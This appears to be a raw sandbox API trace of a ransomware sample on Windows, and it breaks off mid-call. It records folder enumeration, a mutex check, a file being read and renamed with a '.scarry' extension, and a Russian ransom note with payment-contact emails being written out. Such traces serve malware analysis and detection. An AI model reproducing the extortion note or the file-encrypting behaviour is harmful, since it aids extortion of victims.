[0104.921] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.923] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.923] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.923] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0104.923] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0104.923] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.924] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.924] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.925] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.925] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.925] GlobalLock (hMem=0x450004) returned 0x591988 [0104.925] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.925] GlobalUnlock (hMem=0x450004) returned 0 [0104.925] GlobalLock (hMem=0x450004) returned 0x591988 [0104.925] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.925] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.925] GlobalUnlock (hMem=0x450004) returned 0 [0104.925] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.925] GlobalUnlock (hMem=0x45000c) returned 0 [0104.925] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0104.925] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.925] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0104.925] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0104.925] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0104.926] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.926] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.926] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.926] GlobalUnlock (hMem=0x45000c) returned 0 [0104.926] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.926] GlobalLock (hMem=0x450004) returned 0x593998 [0104.926] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.926] GlobalUnlock (hMem=0x45000c) returned 0 [0104.926] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.926] GlobalUnlock (hMem=0x450004) returned 0 [0104.926] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.926] CharLowerBuffW (in: lpsz="EQNEDT32.CNT", cchLength=0xc | out: lpsz="eqnedt32.cnt") returned 0xc [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", cchWideChar=68, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNTñ", lpUsedDefaultChar=0x0) returned 68 [0104.927] CharLowerBuffW (in: lpsz=".CNT", cchLength=0x4 | out: lpsz=".cnt") returned 0x4 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".cnt", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cntShared\\EQUATION\\EQNEDT32.CNTñ", lpUsedDefaultChar=0x0) returned 4 [0104.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\я"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.002] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d38*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d38*, lpNumberOfBytesWritten=0x18ed70*=0x1, lpOverlapped=0x0) returned 1 [0105.003] CloseHandle (hObject=0x1a4) returned 1 [0105.004] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\я")) returned 1 [0105.005] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 0x58b060 [0105.005] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0105.005] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0105.006] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0105.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", dwFileAttributes=0x20) returned 1 [0105.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.012] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.012] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x9fd [0105.013] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.013] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f28, nNumberOfBytesToRead=0x9fd, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesRead=0x18ea34*=0x9fd, lpOverlapped=0x0) returned 1 [0105.060] GlobalLock (hMem=0x450004) returned 0x591988 [0105.060] GlobalLock (hMem=0x45000c) returned 0x593998 [0105.060] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.060] GlobalUnlock (hMem=0x450004) returned 0 [0105.060] GlobalHandle (pMem=0x593998) returned 0x45000c [0105.060] GlobalUnlock (hMem=0x45000c) returned 0 [0105.060] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.060] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.060] GlobalUnlock (hMem=0x45000c) returned 0 [0105.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d998a8, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry") returned 39 [0105.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\jbftmxnwtnn7aojxzayo12z6l3wt581+.scarry")) returned 1 [0105.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\jbftmxnwtnn7aojxzayo12z6l3wt581+.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.176] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0105.177] CloseHandle (hObject=0x1a4) returned 1 [0105.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry", dwFileAttributes=0x20) returned 1 [0105.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0105.177] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.177] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.177] GlobalUnlock (hMem=0x45000c) returned 0 [0105.178] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.178] GlobalLock (hMem=0x450004) returned 0x593998 [0105.178] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.178] GlobalUnlock (hMem=0x45000c) returned 0 [0105.178] GlobalHandle (pMem=0x593998) returned 0x450004 [0105.178] GlobalUnlock (hMem=0x450004) returned 0 [0105.178] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0105.178] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0105.178] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x553a80, ftCreationTime.dwLowDateTime=0x22239048, ftCreationTime.dwHighDateTime=0x550000, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x553a80, nFileSizeHigh=0x2000002, nFileSizeLow=0x9569b257, dwReserved0=0xc00008c8, dwReserved1=0x7ff, cFileName="鮀Ǫ\x18\x03", cAlternateFileName="")) returned 0xffffffff [0105.178] GetLastError () returned 0x2 [0105.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesWritten=0x18ed24*=0xdf9, lpOverlapped=0x0) returned 1 [0105.180] CloseHandle (hObject=0x1a4) returned 1 [0105.182] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0105.182] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0105.183] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0105.183] GlobalLock (hMem=0x450004) returned 0x591988 [0105.183] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.183] GlobalUnlock (hMem=0x450004) returned 0 [0105.183] GlobalLock (hMem=0x450004) returned 0x591988 [0105.183] GlobalLock (hMem=0x45000c) returned 0x593998 [0105.183] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.183] GlobalUnlock (hMem=0x450004) returned 0 [0105.183] GlobalHandle (pMem=0x593998) returned 0x45000c [0105.183] GlobalUnlock (hMem=0x45000c) returned 0 [0105.183] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0105.183] CharLowerBuffW (in: lpsz="EQNEDT32.EXE", cchLength=0xc | out: lpsz="eqnedt32.exe") returned 0xc [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0105.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0105.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 